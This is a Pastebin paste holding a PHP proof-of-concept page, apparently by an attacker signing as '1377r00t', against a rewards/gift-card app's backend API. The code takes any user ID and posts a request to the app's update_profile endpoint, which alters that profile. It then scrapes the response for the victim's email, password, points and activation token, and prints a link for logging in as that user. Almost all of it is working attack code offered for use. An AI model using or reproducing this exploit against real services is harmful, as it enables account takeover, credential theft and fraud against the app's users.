BugAR

Pwned Members AppJoy Gift Card

Apr 16th, 2017
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.00 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title> p0c :) </title>
  4. <style>
  5. input[type=text] {
  6.     padding:5px;
  7.     border:2px solid #ccc;
  8.     -webkit-border-radius: 5px;
  9.     border-radius: 5px;
  10. }
  11.  
  12. input[type=text]:focus {
  13.     border-color:#333;
  14. }
  15.  
  16. input[type=submit] {
  17.     padding:5px 15px;
  18.     background:#ccc;
  19.     border:0 none;
  20.     cursor:pointer;
  21.     -webkit-border-radius: 5px;
  22.     border-radius: 5px;
  23. }
  24. </style>
  25. </head>
  26. <body>
  27. <center>
  28. <h1>BoomGift by 1377r00t</h1><br>
  29. <img class="cover-image" src="//lh3.googleusercontent.com/SMYb1h5kMovjciqmrjlnSvlHTGJgDrIZ5C8EAL_shMlLNy-EMf7B2NisN73AiF2pTuE=w180" alt="Cover art" aria-hidden="true" itemprop="image">
  30. <br>
  31. <a href="https://play.google.com/store/apps/details?id=com.rewardsappscashearn" ><strong>Download APP Gift</strong></a><br>
  32. <form method="POST" action="">
  33. <font color="red">ID : </font><input name="id" type="text">    <font color="blue">-> ex: 1337</font><br>
  34. <input type="submit" value="Get Info :)">
  35. </center>
  36. </form>
  37. <?php
  38. $id = $_POST['id'];
  39. $ch = curl_init();
  40. curl_setopt($ch, CURLOPT_URL, "http://rewardcashapp.biz/reward_wallet/admin/index.php/api_new/update_profile?password=&paypal_account=&first_name=testername&user_id=${id}&last_name=testername");
  41. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  42. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  43. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  44. curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  45.     'X-Oc-Merchant-Id: aF5tGHO90OlNjYhhg',
  46.     'Content-Type: application/x-www-form-urlencoded',
  47.     'Host: rewardcashapp.biz',
  48.     'Connection: Keep-Alive',
  49.     'User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)'
  50.     ));
  51. curl_setopt($ch, CURLOPT_HEADER, 1);
  52. curl_setopt($ch, CURLOPT_POSTFIELDS, "password=&paypal_account=&first_name=testername&user_id=${id}&last_name=testername");
  53. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  54. $check = curl_exec($ch);
  55. ###############################################################
  56. ////////////////////
  57. $startpoints = explode('"points":"' , $check );
  58. $endpoints = explode('","' , $startpoints[1] );
  59. $points = $endpoints[0];
  60. /////////////////////
  61. $staremail = explode('","email":"' , $check );
  62. $endemail = explode('","' , $staremail[1] );
  63. $emailz = $endemail[0];
  64. /////////////////////
  65. $starpass = explode('password":"' , $check );
  66. $endpass = explode('","' , $starpass[1] );
  67. $pass = $endpass[0];
  68. /////////////////////
  69. $starttoken = explode('","activation_code":"' , $check );
  70. $endtoken = explode('","' , $starttoken[1] );
  71. $token = $endtoken[0];
  72. ###############################################################
  73. echo '
  74. <center>
  75. Id : '.$id.'<br>
  76. Email : '.$emailz.'<br>
  77. Password : '.$pass.'<br>
  78. <font color="red">Points : '.$points.'</font><br><br></br>
  79. What ?? Login Failed !<br><br>
  80. Click Link : <a href="http://rewardcashapp.biz/reward_wallet/admin/index.php/users/activation/'.$token.'" ><strong>Click Me</strong></a><br><br></br>
  81. <font color="green">And Login Again</font>
  82. <br><br>
  83. <h4>Powered by 1337r00t</h4>
  84. </center>
  85. ';
  86. ?>
  87. </body>
  88. </html>
Add Comment
Please, Sign In to add comment